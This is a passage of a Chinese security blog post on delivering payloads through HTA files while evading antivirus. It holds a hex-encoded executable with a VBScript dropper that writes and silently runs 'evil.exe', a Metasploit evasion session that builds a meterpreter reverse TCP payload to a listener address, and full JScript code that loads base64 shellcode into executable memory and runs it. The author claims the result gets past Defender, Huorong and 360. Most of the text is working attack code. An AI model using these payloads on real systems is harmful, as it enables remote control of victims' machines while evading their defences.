00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003c6000000000000000000000a46500001c610000a8600000000000000000000024660000886100000000000000000000000000000000000000000000fc6100000c620000246200003c6200004a6200005e620000746200008a6200009a620000ae620000c0620000d2620000ec620000fc620000186300003063000040630000506300006a6300008863000090630000a4630000b2630000ce630000de630000f063000000000000006400000e6400001e6400002a6400003a6400004c640000606400006a64000078640000826400008c64000098640000a0640000a8640000b2640000bc640000c8640000d0640000da640000e2640000ec640000f4640000fe64000008650000126500001c650000266500003065000000000000fc6100000c620000246200003c6200004a6200005e620000746200008a6200009a620000ae620000c0620000d2620000ec620000fc620000186300003063000040630000506300006a6300008863000090630000a4630000b2630000ce630000de630000f063000000000000006400000e6400001e6400002a6400003a6400004c640000606400006a64000078640000826400008c64000098640000a0640000a8640000b2640000bc640000c8640000d0640000da640000e2640000ec640000f4640000fe64000008650000126500001c650000266500003065000000000000a7004372656174655468726561640000c40044656c657465437269746963616c53656374696f6e00df00456e746572437269746963616c53656374696f6e00005301467265654c69627261727900b10147657443757272656e7450726f6365737300b20147657443757272656e7450726f63657373496400b50147657443757272656e7454687265616449640000ee014765744c6173744572726f720000fe014765744d6f64756c6548616e646c65410000290247657450726f63416464726573730000440247657453746172747570496e666f41005b0247657453797374656d54696d65417346696c6554696d650073024765745469636b436f756e740000c602496e697469616c697a65437269746963616c53656374696f6e0001034c65617665437269746963616c53656374696f6e000003034c6f61644c69627261727941000006034c6f61644c69627261727957000067035175657279506572666f726d616e6365436f756e746572003104536574556e68616e646c6564457863657074696f6e46696c746572003d04536c6565700049045465726d696e61746550726f6365737300005004546c7347657456616c7565005d04556e68616e646c6564457863657074696f6e46696c746572000074045669727475616c416c6c6f6300007d045669727475616c50726f74656374000080045669727475616c5175657279000038005f5f646c6c6f6e65786974003b005f5f6765746d61696e61726773003c005f5f696e6974656e760045005f5f6c636f6e765f696e6974000069005f5f7365745f6170705f7479706500006c005f5f736574757365726d61746865727200007a005f61636d646c6e008f005f616d73675f657869740000a0005f63657869740000fc005f666d6f646500003d015f696e69747465726d0041015f696f620000a5015f6c6f636b0047025f6f6e6578697400f5025f756e6c6f636b007b035f77696e6d616a6f7200bd0361626f727400cb0363616c6c6f630000d503657869740000e503667072696e746600ec03667265650000f703667772697465000024046d616c6c6f6300002c046d656d637079000049047369676e616c00005d047374726c656e000060047374726e636d7000800476667072696e7466000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000004b45524e454c33322e646c6c00000000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000006d73766372742e646c6c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010104000000000000000000060104000a0184000000000000000000010174000c016400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000198040001c804000345040002070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

可以看到shellcode为PE格式,执行调用Wscript.shell

同样会被Defender拦截

0x04 MetaSploit::windows_defender_js_hta

Msf5更新后新加入了两个evasion

  • evasion/windows/windows_defender_exe
  • evasion/windows/windows_defender_js_hta

exe报毒有点惨淡
3e2ff0218d8efce1f3709b339560c13e

但是defender和火绒还是没关系的
dc2b1ad02452c9baafe83eae5ee3d588

hta文件
d83749536340df88df744509897dc80a
Defender,火绒,360都能过
0533eaf110cdcc3a1583fd3e03cb12ed

1
2
3
4
5
6
7
8
9
10
11
12
msf5 > use evasion/windows/windows_defender_js_hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set lhost 192.168.1
set lhost 192.168.1.105 set lhost 192.168.121.1
msf5 evasion(windows/windows_defender_js_hta) > set lhost 192.168.1.105
lhost => 192.168.1.105
msf5 evasion(windows/windows_defender_js_hta) > set lport 8877
lport => 8877
msf5 evasion(windows/windows_defender_js_hta) > exploit

[+] QWZwXErrm.hta stored at /Users/patrilic/.msf4/local/QWZwXErrm.hta

核心代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;

function InvokeWin32(dllName:String, returnType:Type,
methodName:String, parameterTypes:Type[], parameters:Object[])
{
// Begin to build the dynamic assembly
var domain = AppDomain.CurrentDomain;
var name = new System.Reflection.AssemblyName('PInvokeAssembly');
var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
var module = assembly.DefineDynamicModule('PInvokeModule');
var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit);

// Define the actual P/Invoke method
var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes);

// Apply the P/Invoke constructor
var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]);
var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]);
method.SetCustomAttribute(attr);

// Create the temporary type, and invoke the method.
var realType = type.CreateType();
return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters);
}

function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")];
var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes, parameters );
}

function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ];
var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes, parameters );
}

function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")];
var parameters:Object[] = [handle, dwMiliseconds ];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes, parameters );
}

function ShellCodeExec()
{
var MEM_COMMIT:uint = 0x1000;
var PAGE_EXECUTE_READWRITE:uint = 0x40;

var shellcodestr:String = '/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCACKtwKgBaUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//VSAHDSCnGSIX2deFB/+c='
var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr);
var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE);


Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
var hThread:IntPtr = IntPtr.Zero;
var threadId:UInt32 = 0;
// prepare data
var pinfo:IntPtr = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);

}
try{
ShellCodeExec();
}catch(e){}

hta代码片段
a67569474b21379b1c9d6c0b41a63a4e

Wscript.shell执行

生成JS执行Shellcode

CACTUSTORCH.hta
使用mshta.exe绕过应用程序白名单(多种方法)
第七十五课:基于白名单Mshta.exe执行payload第五季